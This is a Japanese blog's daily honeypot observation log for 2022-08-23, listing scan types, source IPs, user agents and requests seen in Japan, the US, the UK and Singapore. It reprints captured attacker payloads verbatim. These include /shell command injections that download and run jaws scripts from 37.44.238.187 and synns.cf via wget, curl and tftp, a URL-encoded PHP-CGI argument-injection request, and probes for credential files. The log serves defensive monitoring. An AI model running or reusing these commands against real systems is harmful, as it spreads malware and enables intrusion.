コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/08/23 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/08/23分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

.cssへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
curlによるスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
PHP脆弱性(CVE-2012-1823)を狙うアクセス
/.gitへのスキャン行為
phpMyAdminへのスキャン行為
5.188.210.227に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
wget http://37.44.238.187/jaws.sh;
curl -O http://37.44.238.187/jaws.sh;
chmod 777 jaws.sh;
sh jaws.sh;
tftp 37.44.238.187 -c get jaws1.sh;
chmod 777 jaws1.sh;
sh jaws1.sh;
tftp -r jaws2.sh -g 37.44.238.187;
chmod 777 jaws2.sh;
sh jaws2.sh;
rm -rf jaws.sh jaws1.sh jaws2.sh
cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws
Location:SG

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget synns.cf/jaws;
sh /tmp/jaws
アクセス数推移

JP:総アクセス数:79 (前日比:8)
US:総アクセス数:148 (前日比:-169)
UK:総アクセス数:41 (前日比:-64)
SG:総アクセス数:105 (前日比:39)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
6 2.57.122.80 Romania
10 5.8.10.202 Russia
2 20.125.113.195 United States
1 20.163.87.66 United States
1 52.53.248.49 United States
1 68.183.159.229 United States
1 80.82.70.228 United Kingdom
13 95.214.235.205 Ukraine
1 107.175.21.30 United States
2 109.237.103.118 Russia
2 109.237.103.123 Russia
6 122.9.116.211 China
15 135.125.244.48 France
1 137.184.126.214 United States
1 162.62.191.231 Singapore
3 167.71.167.246 United States
1 171.22.30.44 Bulgaria
2 173.249.56.171 Germany
3 183.146.30.163 China
1 185.220.101.175 Germany
1 192.241.212.228 United States
1 192.241.221.216 United States
1 205.185.121.69 United States
1 205.210.31.35 United States
1 209.127.109.71 Canada
1 216.218.206.114 United States

UserAgent一覧

件数 UserAgent
21 -
2 Go-http-client/1.1
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
5 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
35 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.28.1

リクエスト内容一覧

件数 Method Request Protocol
2 \x16\x03\x01\x01D\x01
8 \x16\x03\x01
1 \x16\x03\x02\x01o\x01
1 \xb9g\x10\xeaf\x8asFz\x962 \"\xca\xc3\xf16\x11\x04\x02\x165F\x02\xac\xb9\x87\xa9\x1a5F\x02\x171\x04\x02\x165E\n
1 GET /.aws/credentials HTTP/1.1
40 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab9 HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /sendgrid.env HTTP/1.1
2 GET /server-status HTTP/1.1
1 GET /wp-includes/css/buttons.css HTTP/1.1
3 GET http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php HTTP/1.0
3 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php HTTP/1.0
3 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
2 20.118.132.158 United States
2 45.61.185.39 United States
1 46.98.133.196 Ukraine
7 51.79.29.48 Canada
1 51.83.137.123 France
3 51.159.164.227 France
2 52.143.138.12 United States
101 124.79.92.254 China
2 144.22.245.160 Brazil
1 162.142.125.10 United States
1 162.142.125.211 United States
1 162.142.125.221 United States
1 165.22.206.82 United States
1 171.22.30.44 Bulgaria
1 172.104.242.173 United States
1 184.105.247.194 United States
3 185.7.214.117 Hong Kong
9 185.254.196.223 Ukraine
1 192.241.192.232 United States
1 192.241.213.152 United States
1 192.241.215.196 United States
1 192.241.220.189 United States
2 194.165.16.72 Panama
1 198.235.24.134 United States
1 198.235.24.152 United States

UserAgent一覧

件数 UserAgent
9 -
2 Mozilla 5/0
4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
17 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
3 curl/7.81.0

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
2 \x03
2 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
21 GET /.env HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/ HTTP/1.1
2 HEAD / HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 5.188.210.227 Russia
2 13.95.140.33 United States
1 20.225.151.129 United States
1 27.158.226.24 China
1 37.44.238.185 France
1 45.61.185.39 United States
2 45.227.254.55 Belize
1 46.148.40.122 Iran
1 64.62.197.11 United States
1 66.240.192.82 United States
1 107.182.129.239 United States
3 118.123.105.85 China
6 118.126.82.157 China
2 138.197.183.239 United States
1 154.27.24.28 United States
1 162.142.125.219 United States
1 165.22.206.82 United States
1 167.94.138.44 United States
1 171.22.30.44 Bulgaria
1 172.104.242.173 United States
1 181.214.206.161 United States
2 185.7.214.117 Hong Kong
1 192.241.208.213 United States
1 192.241.216.110 United States
1 192.241.222.154 United States
1 194.28.112.135 Moldova
2 194.165.16.78 Panama
1 198.235.24.141 United States
1 208.67.105.236 United States

UserAgent一覧

件数 UserAgent
20 -
1 Hello, world
2 Java/1.8.0_341
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 ``
1 python-requests/2.21.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
4 \x03
4 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 CONNECT www[.]dazn[.]com:443 HTTP/1.1
1 CONNECT www[.]netflix[.]com:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /ReportServer HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F37[.]44[.]238[.]187%2Fjaws.sh%3B%20curl%20-O%20http%3A%2F%2F37[.]44[.]238[.]187%2Fjaws.sh%3B%20chmod%20777%20jaws.sh%3B%20sh%20jaws.sh%3B%20tftp%2037.44.238.187%20-c%20get%20jaws1.sh%3B%20chmod%20777%20jaws1.sh%3B%20sh%20jaws1.sh%3B%20tftp%20-r%20jaws2.sh%20-g%2037.44.238.187%3B%20chmod%20777%20jaws2.sh%3B%20sh%20jaws2.sh%3B%20rm%20-rf%20jaws.sh%20jaws1.sh%20jaws2.sh HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php HTTP/1.0
2 GET http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
3 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.55.53.144 United States
1 20.109.58.118 United States
1 27.41.16.169 China
1 41.238.35.207 Egypt
4 45.227.254.49 Belize
17 51.79.29.48 Canada
3 51.178.119.213 France
1 66.240.192.82 United States
1 69.67.150.36 United States
1 74.119.193.190 Moldova
2 80.66.66.14 Russia
1 89.190.156.179 United States
2 107.175.21.30 United States
4 109.237.103.123 Russia
2 138.197.183.239 United States
1 162.142.125.220 United States
1 162.142.125.221 United States
1 167.94.138.120 United States
1 167.248.133.60 United States
1 171.22.30.44 Bulgaria
1 172.104.242.173 United States
1 184.105.247.254 United States
2 185.7.214.117 Hong Kong
8 185.254.196.223 Ukraine
42 188.166.186.92 United States
1 192.241.208.192 United States
1 192.241.212.184 United States
1 194.28.112.135 Moldova
1 198.235.24.6 United States

UserAgent一覧

件数 UserAgent
18 -
1 Hello, World
1 Hello, world
1 Mozila/5.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
41 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
32 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 zgrab/0.x
1 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 python-requests/2.18.4
1 python-requests/2.21.0

リクエスト内容一覧

件数 Method Request Protocol
1 B\xb1
6 \x03
2 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 \xbcX\xa5\x02\x11\x878%*+\xae%\v'\x96sJ*#\xc2j\x0ea\xc2\xd0\x82\xa0if\x0ea\xc2k
1 GET /.aws/credentials HTTP/1.1
2 GET /.env.bak HTTP/1.1
1 GET /.env.example HTTP/1.1
33 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /13.67.44.234/.env HTTP/1.1
1 GET /13.67.44.234/api/.env HTTP/1.1
1 GET /_profiler HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
1 GET /base/.env HTTP/1.1
1 GET /blog/.env HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /crm/.env HTTP/1.1
1 GET /database/.env HTTP/1.1
1 GET /demo/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /new/.env HTTP/1.1
1 GET /newsite/.env HTTP/1.1
1 GET /old/.env HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
2 GET /phpinfo HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /production/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+synns[.]cf/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /storage/.env HTTP/1.1
1 GET /vendor/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /website/.env HTTP/1.1
1 GET /www/.env HTTP/1.1
1 POST /.env HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-comments-post.php HTTP/1.1
4 PRI * HTTP/2.0